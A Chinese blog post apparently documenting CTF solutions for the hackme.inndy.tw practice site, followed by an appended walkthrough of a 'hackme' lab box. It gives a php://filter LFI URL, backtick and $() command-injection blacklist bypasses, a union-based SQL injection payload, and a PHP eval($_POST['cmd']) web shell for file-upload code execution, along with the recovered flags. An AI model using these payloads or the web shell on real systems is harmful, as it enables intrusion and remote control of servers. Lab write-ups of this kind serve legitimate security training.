hackme 边做边记录

本文详细介绍了通过LFI(本地文件包含)漏洞读取敏感文件的过程。从发现提示到利用封装协议读取PHP源码,再到解码获取flag,展示了完整的攻击流程。同时,文章还涉及命令执行和黑名单绕过技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

  1. LFI

在login界面查看源代码得到提示

<a href="?page=pages/flag">Flag</a>

想到使用封装协议读取php文件,URL如下:

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag

得到php源码

Q2FuIHlvdSByZWFkIHRoZSBmbGFnPD9waHAgcmVxdWlyZSgnY29uZmlnLnBocCcpOyA/Pj8K
Can you read the flag<?php require('config.php'); ?>?   

接着包含config文件,url如下:

https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/config

读取php源码:

PD9waHAKCiRmbGFnID0gIkZMQUd7WW9vb29vb19MRklfZzAwZF8yY1h4c1hTWVA5RVZMcklvfSI7Cg==

解密得到flag:FLAG{Yoooooo_LFI_g00d_2cXxsXSYP9EVLrIo}

  1. homepage

在源代码里面看到js:<script src="cute.js"></script>
点进去是aaencode编码,解码成一个二维码,扫描得flag:FLAG{Oh, You found me!!!!!! Yeeeeeeee.}

  1. ping
    命令执行,看到黑名单,没有过滤可以进行命令替换的反引号` 和$()
`ls`

或者

$(ls)

读到flag.php,黑名单过滤了flag,可以用?来通配,由于限制输入长度,所以用`

`sort ????????`

得到flag:FLAG{ping_$(capture-the-flag)_UtUbtnvY5F9Hn5dR}

### 关于 HackMe 靶机通关攻略 #### 利用 Web 应用程序中的 SQL 注入漏洞获取数据库信息 SQL注入是一种常见的Web应用程序安全漏洞,允许攻击者执行任意SQL查询。对于`hackme2`靶场而言,在存在SQL注入的地方可以尝试使用特定的payload来枚举表名[^4]。 ```sql -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' # ``` 此语句将返回名为 `webapphacking` 的数据库下的所有表格名称列表,这有助于进一步了解应用结构并发现潜在的目标数据存储位置。 #### 发现并利用文件上传功能实现远程代码执行 某些情况下,Web应用程序可能提供文件上传的功能。如果这种机制缺乏足够的验证措施,则可能会被用来上载恶意脚本文件(如PHP木马)。一旦成功上传了一句话木马到服务器端,就可以通过向其发送命令请求来进行后续操作[^5]。 ```php <?php phpinfo(); eval($_POST['cmd']); ?> ``` 这段简单的PHP代码片段定义了一个后门接口,它会响应来自客户端提交的数据包中携带的指令参数(`cmd`),从而实现了远程控制的能力。为了定位已上传的一句话木马的确切路径,通常还需要借助目录遍历技术找到对应的URL地址[^3]。 #### 权限提升至超级用户级别 当获得了初步的访问权限之后,下一步便是寻找能够帮助提权的信息或配置错误之处。例如,可以通过查找管理员账户凭证或者其他敏感资源来完成这一过程。最终目的是以更高的特权状态运行命令,进而完全掌控整个系统环境[^1]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值